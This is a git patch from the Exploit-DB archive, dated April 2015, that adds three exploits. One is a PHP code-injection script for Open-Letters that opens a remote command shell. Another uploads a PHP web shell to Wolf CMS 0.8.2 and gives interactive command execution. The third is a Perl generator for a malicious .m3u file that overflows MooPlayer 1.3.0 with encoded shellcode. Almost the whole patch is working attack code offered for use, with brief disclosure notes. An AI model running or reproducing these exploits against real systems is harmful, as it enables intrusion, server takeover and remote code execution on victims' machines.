From 6ddbb48d4d82bb1311637a8fc954f2687a41f59e Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 23 Apr 2015 05:03:27 +0000
Subject: [PATCH] DB: 2015-04-23

3 new exploits
---
 files.csv                        |   3 +
 platforms/php/webapps/36816.php  |  78 ++++++++++++++
 platforms/php/webapps/36818.php  | 173 +++++++++++++++++++++++++++++++
 platforms/windows/local/36819.pl | 119 +++++++++++++++++++++
 4 files changed, 373 insertions(+)
 create mode 100755 platforms/php/webapps/36816.php
 create mode 100755 platforms/php/webapps/36818.php
 create mode 100755 platforms/windows/local/36819.pl

diff --git a/files.csv b/files.csv
index 2cf14c6b1..e216bb909 100755
--- a/files.csv
+++ b/files.csv
@@ -26594,6 +26594,7 @@ id,file,description,date,author,platform,type,port
 29687,platforms/windows/remote/29687.py,"HyperBook Guestbook 1.3 GBConfiguration.DAT Hashed Password Information Disclosure Vulnerability",2007-02-28,PeTrO,windows,remote,0
 29544,platforms/php/webapps/29544.txt,"Juniper Junos J-Web - Privilege Escalation Vulnerability",2013-11-12,"Sense of Security",php,webapps,0
 29545,platforms/windows/dos/29545.rb,"Hanso Converter 2.4.0 - 'ogg' Buffer Overflow (DoS)",2013-11-12,"Necmettin COSKUN",windows,dos,0
+36816,platforms/php/webapps/36816.php,"Open-Letters Remote PHP Code Injection Vulnerability",2015-04-22,"TUNISIAN CYBER",php,webapps,80
 29546,platforms/windows/dos/29546.rb,"Provj 5.1.5.8 - 'm3u' Buffer Overflow (PoC)",2013-11-12,"Necmettin COSKUN",windows,dos,0
 29548,platforms/windows/local/29548.rb,"VideoSpirit Lite 1.77 - (SEH) Buffer Overflow",2013-11-12,metacom,windows,local,0
 29549,platforms/windows/local/29549.pl,"ALLPlayer 5.6.2 - (.m3u) Local Buffer Overflow (SEH/Unicode)",2013-11-12,"Mike Czumak",windows,local,0
@@ -33217,3 +33218,5 @@ id,file,description,date,author,platform,type,port
 36813,platforms/hardware/local/36813.txt,"ADB Backup Archive Path Traversal File Overwrite",2015-04-21,"Imre Rad",hardware,local,0
 36814,platforms/osx/dos/36814.c,"Mac OS X Local Denial of Service",2015-04-21,"Maxime Villard",osx,dos,0
 36815,platforms/cfm/webapps/36815.txt,"BlueDragon CFChart Servlet 7.1.1.17759 - Arbitrary File Retrieval/Deletion",2015-04-21,Portcullis,cfm,webapps,80
+36818,platforms/php/webapps/36818.php,"Wolf CMS 0.8.2 Arbitrary File Upload Exploit",2015-04-22,"CWH Underground",php,webapps,80
+36819,platforms/windows/local/36819.pl,"MooPlayer 1.3.0 'm3u' SEH Buffer Overflow",2015-04-22,"Tomislav Paskalev",windows,local,0
diff --git a/platforms/php/webapps/36816.php b/platforms/php/webapps/36816.php
new file mode 100755
index 000000000..d0d16f032
--- /dev/null
+++ b/platforms/php/webapps/36816.php
@@ -0,0 +1,78 @@
+<?php
+  
+/*
+OutPut:
+#[+] Author: TUNISIAN CYBER
+#[+] Script coded BY: Egidio Romano aka EgiX
+#[+] Title: Open-Letters Remote PHP Code Injection Vulnerability
+#[+] Date: 19-04-2015
+#[+] Vendor: http://www.open-letters.de/
+#[+] Type: WebAPP
+#[+] Tested on: KaliLinux (Debian)
+#[+] CVE:
+#[+] Twitter: @TCYB3R
+#[+] Egix's Contact: n0b0d13s[at]gmail[dot]com
+#[+] Proof of concept: http://i.imgur.com/TNKV8Mt.png
+OL-shell> 
+  
+*/
+  
+error_reporting(0);
+set_time_limit(0);
+ini_set("default_socket_timeout", 5);
+  
+function http_send($host, $packet)
+{
+    if (!($sock = fsockopen($host, 80)))
+        die( "\n[-] No response from {$host}:80\n");
+  
+    fwrite($sock, $packet);
+    return stream_get_contents($sock);
+}
+  
+print "#[+] Author: TUNISIAN CYBER\n";
+print "#[+] Script coded BY: Egidio Romano aka EgiX\n";
+print "#[+] Title: Open-Letters Remote PHP Code Injection Vulnerability\n";
+print "#[+] Date: 19-04-2015\n";
+print "#[+] Vendor: http://www.open-letters.de/\n";
+print "#[+] Type: WebAPP\n";
+print "#[+] Tested on: KaliLinux (Debian)\n";
+print "#[+] CVE:\n";
+print "#[+] Twitter: @TCYB3R\n";
+print "#[+] Egix's Contact: n0b0d13s[at]gmail[dot]com\n";
+print "#[+] Proof of concept: http://i.imgur.com/TNKV8Mt.png";
+  
+if ($argc < 3)
+{
+    print "\nUsage......: php $argv[0] <host> <path>";
+    print "\nExample....: php $argv[0] localhost /";
+    print "\nExample....: php $argv[0] localhost /zenphoto/\n";
+    die();
+}
+  
+$host = $argv[1];
+$path = $argv[2];
+  
+$exploit = "foo=<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>";
+$packet  = "POST {$path}external_scripts/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Content-Length: ".strlen($exploit)."\r\n";
+$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
+$packet .= "Connection: close\r\n\r\n{$exploit}";
+  
+http_send($host, $packet);
+  
+$packet  = "GET {$path}external_scripts/tinymce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Cmd: %s\r\n";
+$packet .= "Connection: close\r\n\r\n";
+  
+while(1)
+{
+    print "\nOL-shell> ";
+    if (($cmd = trim(fgets(STDIN))) == "exit") break;
+    preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ?
+    print $m[1] : die("\n[-] Exploit failed!\n");
+}
+  
+?>
\ No newline at end of file
diff --git a/platforms/php/webapps/36818.php b/platforms/php/webapps/36818.php
new file mode 100755
index 000000000..8cac14077
--- /dev/null
+++ b/platforms/php/webapps/36818.php
@@ -0,0 +1,173 @@
+<?php
+/*
+ 
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /        
+  / XXXXXX /
+ (________(          
+  `------'
+  
+ Exploit Title   : Wolf CMS Arbitrary File Upload Exploit
+ Date            : 22 April 2015
+ Exploit Author  : CWH Underground
+ Discovered By   : ZeQ3uL
+ Site            : www.2600.in.th
+ Vendor Homepage : https://www.wolfcms.org/
+ Software Link   : https://bitbucket.org/wolfcms/wolf-cms-downloads/downloads/wolfcms-0.8.2.zip
+ Version         : 0.8.2
+   
+####################
+SOFTWARE DESCRIPTION
+####################
+   
+Wolf CMS is a content management system and is Free Software published under the GNU General Public License v3. 
+Wolf CMS is written in the PHP programming language. Wolf CMS is a fork of Frog CMS.
+   
+#######################################
+VULNERABILITY: Arbitrary File Upload
+#######################################
+    
+This exploit a file upload vulnerability found in Wolf CMS 0.8.2, and possibly prior. Attackers can abuse the
+upload feature in order to upload a malicious PHP file into the application with authenticated user, which results in arbitrary remote code execution.
+
+The vulnerability was found on File Manager Function (Enabled by default), which provides interfaces to manage files from the administration. 
+
+In this simple example, there are no restrictions made regarding the type of files allowed for uploading. 
+Therefore, an attacker can upload a PHP shell file with malicious code that can lead to full control of a victim server. 
+Additionally, the uploaded file can be moved to the root directory, meaning that the attacker can access it through the Internet.
+   
+/wolf/plugins/file_manager/FileManagerController.php (LINE: 302-339)
+-----------------------------------------------------------------------------
+// Clean filenames
+        $filename = preg_replace('/ /', '_', $_FILES['upload_file']['name']);
+        $filename = preg_replace('/[^a-z0-9_\-\.]/i', '', $filename);
+
+        if (isset($_FILES)) {
+            $file = $this->_upload_file($filename, FILES_DIR . '/' . $path . '/', $_FILES['upload_file']['tmp_name'], $overwrite);
+
+            if ($file === false)
+                Flash::set('error', __('File has not been uploaded!'));
+        }
+-----------------------------------------------------------------------------
+
+#####################
+Disclosure Timeline
+#####################
+
+[04/04/2015] - Issue reported to Developer Team
+[08/04/2015] - Discussed for fixing the issue
+[16/04/2015] - Issue reported to http://seclists.org/oss-sec/2015/q2/210
+[22/04/2015] - Public disclosure
+
+#####################################################
+EXPLOIT
+#####################################################
+  
+*/
+ 
+error_reporting(0);
+set_time_limit(0);
+ini_set("default_socket_timeout", 50);
+ 
+function http_send($host, $packet)
+{
+    if (!($sock = fsockopen($host, 80)))
+        die("\n[-] No response from {$host}:80\n");
+  
+    fputs($sock, $packet);
+    return stream_get_contents($sock);
+}
+ 
+print "\n+---------------------------------------+";
+print "\n| WolfCMS Arbitrary File Upload Exploit |";
+print "\n+---------------------------------------+\n";
+  
+if ($argc < 5)
+{
+    print "\nUsage......: php $argv[0] <host> <path> <user> <pass>\n";
+    print "\nExample....: php $argv[0] localhost /wolfcms test password\n";
+    die();
+}
+ 
+$host = $argv[1];
+$path = $argv[2];
+$user = $argv[3];
+$pass = $argv[4];
+
+   print "\n  ,--^----------,--------,-----,-------^--,   \n";
+   print "  | |||||||||   `--------'     |          O   \n";
+   print "  `+---------------------------^----------|   \n";
+   print "    `\_,-------, _________________________|   \n";
+   print "      / XXXXXX /`|     /                      \n";
+   print "     / XXXXXX /  `\   /                       \n";
+   print "    / XXXXXX /\______(                        \n";
+   print "   / XXXXXX /                                 \n";
+   print "  / XXXXXX /   .. CWH Underground Hacking Team ..  \n";
+   print " (________(                                   \n";
+   print "  `------'                                    \n";
+
+$login = "login[username]={$user}&login[password]={$pass}&login[redirect]=/wolfcms/?/admin/";
+$packet  = "POST {$path}/?/admin/login/login HTTP/1.1\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Cookie: PHPSESSID=cwh\r\n";
+$packet .= "Content-Length: ".strlen($login)."\r\n";
+$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
+$packet .= "Connection: close\r\n\r\n{$login}"; 
+   
+$response = http_send($host, $packet);
+
+ if (!preg_match_all("/Set-Cookie: ([^;]*);/i", $response, $sid)) die("\n[-] Session ID not found!\n");
+
+$packet  = "GET {$path}/?/admin/plugin/file_manager HTTP/1.1\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Cookie: {$sid[1][2]}\r\n";
+$packet .= "Connection: close\r\n\r\n";
+$response=http_send($host, $packet);
+
+if (!preg_match_all("/csrf_token\" type=\"hidden\" value=\"(.*?)\" \/>/i", $response, $token)) die("\n[-] The username/password is incorrect!\n");
+print "\n[+] Login Successfully !!\n";
+sleep(2);
+print "\n[+] Retrieving The Upload token !!\n";
+print "[+] The token is: {$token[1][4]}\n";
+
+$payload  = "--o0oOo0o\r\n";
+$payload .= "Content-Disposition: form-data; name=\"csrf_token\"\r\n\r\n";
+$payload .= "{$token[1][4]}\r\n";
+$payload .= "--o0oOo0o\r\n";
+$payload .= "Content-Disposition: form-data; name=\"upload_file\"; filename=\"shell.php\"\r\n";
+$payload .= "Content-Type: application/octet-stream\r\n\r\n";
+$payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n";
+$payload .= "--o0oOo0o--\r\n";
+
+$packet  = "POST {$path}/?/admin/plugin/file_manager/upload HTTP/1.1\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Cookie: {$sid[1][2]}\r\n";
+$packet .= "Content-Length: ".strlen($payload)."\r\n";
+$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
+$packet .= "Connection: close\r\n\r\n{$payload}";
+     
+http_send($host, $packet);
+
+$packet  = "GET {$path}/public/shell.php HTTP/1.1\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Cmd: %s\r\n";
+$packet .= "Connection: close\r\n\r\n";
+     
+while(1)
+{
+    print "\nWolf-shell# ";
+    if (($cmd = trim(fgets(STDIN))) == "exit") break;
+    $response = http_send($host, sprintf($packet, base64_encode($cmd)));
+    preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
+}
+
+################################################################################################################
+# Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
+################################################################################################################
+?>
\ No newline at end of file
diff --git a/platforms/windows/local/36819.pl b/platforms/windows/local/36819.pl
new file mode 100755
index 000000000..333e99456
--- /dev/null
+++ b/platforms/windows/local/36819.pl
@@ -0,0 +1,119 @@
+#!/usr/bin/perl
+
+###########################################################################=
+#################################
+# Exploit Title: MooPlayer 1.3.0 'm3u' SEH Buffer Overflow
+# Date: 09-02-2015
+# Exploit Author: Tomislav Paskalev
+# Vulnerable Software: MooPlayer v1.3.0
+# Vendor Homepage: https://mooplayer.jaleco.com/
+# Software Link: http://www.exploit-db.com/apps/a2eba48a6789803f2a3aca8c93b=86cb7-mooplayer-1.3.0.zip
+# Version: 1.3.0
+# Tested on: Windows XP SP2 EN
+# OSVDB-ID: 118128
+###########################################################################=
+#################################
+# Credits:
+# Vulnerability identified by Samandeep Singh
+# http://www.exploit-db.com/exploits/36022/
+###########################################################################=
+#################################
+# Exploit notes:
+# mooplayer.exe was not compiled with SafeSEH, but always contains \x00 (bad character)
+# available and could be used, which would make the exploit work across multiple OS
+# versions, but the shellcode space would be limited since \x00 would terminate the string
+# other available modules (Win XP SP2 EN) - enough space for larger shellcode
+# oledlg.dll (Rebase: False | SafeSEH: False | ASLR: False | NXCompat: False | OS Dll: True)
+# OLEACC.dll (Rebase: False | SafeSEH: False | ASLR: False | NXCompat: False | OS Dll: True)
+###########################################################################=
+#################################
+# Bad characters:
+# "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09"
+# "\x0b\x0c"
+# "\x0e\x0f"
+# "\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19"
+# "\x1a\x1b\x1c\x1d\x1e\x1f"
+###########################################################################=
+#################################
+# How to exploit:
+# MooPlayer -> File -> Open Media File -> Files of type: Playlists -> (navigate to created exploit
+# file) -> Open
+# OR drag and drop created exploit file into MooPlayer
+###########################################################################=
+#################################
+# Thanks to:
+# Samandeep Singh (PoC)
+# Peter Van Eeckhoutte (exploit development tutorials)
+# Offensive Security (IT security courses, admin support)
+###########################################################################=
+#################################
+
+
+$file = "MooPlayer_messagebox.m3u";
+
+my $junk = "A" x 264;
+my $nextSEH = "\xeb\x20\x90\x90"; # jump over the next 32 bytes
+my $SEH = pack('V',0x74c96950); # POP POP RET from oleacc.dll (Win XP SP2 EN)
+my $NOPs = "\x90" x 100;
+
+# msfpayload windows/messagebox
+# msfencode -e x86/alpha_upper
+my $shellcode =
+"\x89\xe5\xd9\xf7\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49" .
+"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
+"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
+"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
+"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4e\x39\x5a" .
+"\x4b\x4d\x4b\x38\x59\x54\x34\x46\x44\x5a\x54\x46\x51\x39" .
+"\x42\x58\x32\x53\x47\x36\x51\x4f\x39\x32\x44\x4c\x4b\x44" .
+"\x31\x46\x50\x4c\x4b\x33\x46\x44\x4c\x4c\x4b\x44\x36\x35" .
+"\x4c\x4c\x4b\x57\x36\x55\x58\x4c\x4b\x53\x4e\x31\x30\x4c" .
+"\x4b\x50\x36\x46\x58\x50\x4f\x52\x38\x54\x35\x4c\x33\x36" .
+"\x39\x53\x31\x58\x51\x4b\x4f\x4d\x31\x45\x30\x4c\x4b\x42" .
+"\x4c\x57\x54\x47\x54\x4c\x4b\x57\x35\x57\x4c\x4c\x4b\x31" .
+"\x44\x51\x38\x33\x48\x35\x51\x4b\x5a\x4c\x4b\x50\x4a\x55" .
+"\x48\x4c\x4b\x31\x4a\x31\x30\x55\x51\x5a\x4b\x4b\x53\x56" .
+"\x54\x30\x49\x4c\x4b\x50\x34\x4c\x4b\x33\x31\x5a\x4e\x50" .
+"\x31\x4b\x4f\x56\x51\x59\x50\x4b\x4c\x4e\x4c\x4b\x34\x59" .
+"\x50\x53\x44\x55\x57\x49\x51\x38\x4f\x34\x4d\x33\x31\x59" .
+"\x57\x4a\x4b\x4c\x34\x47\x4b\x43\x4c\x57\x54\x51\x38\x34" .
+"\x35\x4d\x31\x4c\x4b\x31\x4a\x47\x54\x45\x51\x4a\x4b\x55" .
+"\x36\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x51\x4a\x35\x4c\x33" .
+"\x31\x4a\x4b\x4c\x4b\x43\x34\x4c\x4b\x33\x31\x4b\x58\x4c" .
+"\x49\x30\x44\x51\x34\x35\x4c\x55\x31\x38\x43\x4e\x52\x44" .
+"\x48\x57\x59\x59\x44\x4d\x59\x4a\x45\x4b\x39\x39\x52\x35" .
+"\x38\x4c\x4e\x30\x4e\x44\x4e\x4a\x4c\x50\x52\x4d\x38\x4d" .
+"\x4f\x4b\x4f\x4b\x4f\x4b\x4f\x4b\x39\x30\x45\x34\x44\x4f" .
+"\x4b\x33\x4e\x49\x48\x4d\x32\x33\x43\x4d\x57\x55\x4c\x51" .
+"\x34\x51\x42\x4b\x58\x4c\x4e\x4b\x4f\x4b\x4f\x4b\x4f\x4d" .
+"\x59\x37\x35\x53\x38\x33\x58\x32\x4c\x42\x4c\x37\x50\x37" .
+"\x31\x43\x58\x50\x33\x37\x42\x36\x4e\x53\x54\x53\x58\x54" .
+"\x35\x32\x53\x33\x55\x53\x42\x4b\x38\x31\x4c\x47\x54\x44" .
+"\x4a\x4c\x49\x5a\x46\x50\x56\x4b\x4f\x31\x45\x53\x34\x4c" .
+"\x49\x39\x52\x56\x30\x4f\x4b\x4e\x48\x4f\x52\x30\x4d\x4f" .
+"\x4c\x4d\x57\x55\x4c\x31\x34\x56\x32\x4d\x38\x45\x31\x4b" .
+"\x4f\x4b\x4f\x4b\x4f\x53\x58\x46\x38\x31\x30\x51\x30\x51" .
+"\x30\x33\x58\x36\x34\x45\x35\x54\x33\x33\x44\x56\x51\x39" .
+"\x4b\x4d\x58\x51\x4c\x47\x54\x34\x44\x4b\x39\x5a\x43\x43" .
+"\x58\x52\x4e\x56\x4e\x31\x48\x31\x30\x55\x38\x53\x51\x34" .
+"\x34\x42\x49\x52\x4f\x32\x48\x54\x30\x42\x4c\x42\x49\x43" .
+"\x53\x33\x58\x35\x34\x37\x50\x35\x31\x34\x30\x45\x38\x32" .
+"\x4f\x35\x39\x54\x34\x45\x35\x45\x38\x33\x55\x33\x48\x52" .
+"\x50\x52\x4c\x45\x38\x44\x34\x32\x48\x35\x35\x57\x50\x53" .
+"\x58\x57\x50\x52\x4f\x55\x36\x31\x30\x55\x38\x33\x44\x32" .
+"\x45\x34\x38\x34\x34\x32\x48\x31\x30\x55\x33\x52\x4f\x42" .
+"\x4e\x32\x48\x51\x30\x43\x44\x32\x48\x43\x55\x43\x58\x32" .
+"\x4e\x31\x30\x42\x49\x42\x4e\x52\x48\x42\x55\x33\x44\x32" .
+"\x49\x52\x4f\x55\x38\x43\x55\x33\x48\x42\x45\x42\x43\x35" .
+"\x38\x52\x4f\x45\x34\x52\x45\x51\x30\x32\x48\x55\x35\x33" .
+"\x54\x37\x50\x53\x53\x35\x38\x30\x47\x45\x31\x45\x39\x32" .
+"\x4e\x30\x31\x39\x59\x4d\x58\x30\x4c\x57\x54\x50\x42\x4c" .
+"\x49\x4b\x51\x30\x31\x58\x52\x42\x4a\x57\x30\x31\x43\x50" .
+"\x51\x31\x42\x4b\x4f\x58\x50\x46\x51\x4f\x30\x50\x50\x4b" .
+"\x4f\x50\x55\x45\x58\x41\x41";
+
+# keep the exploit length consistent
+my $endjunk = "\x90" x (10000 - length($junk.$nextSEH.$SEH.$NOPs.$shellcode));
+
+open(myfile,">$file") ;
+print myfile $junk.$nextSEH.$SEH.$NOPs.$shellcode.$endjunk;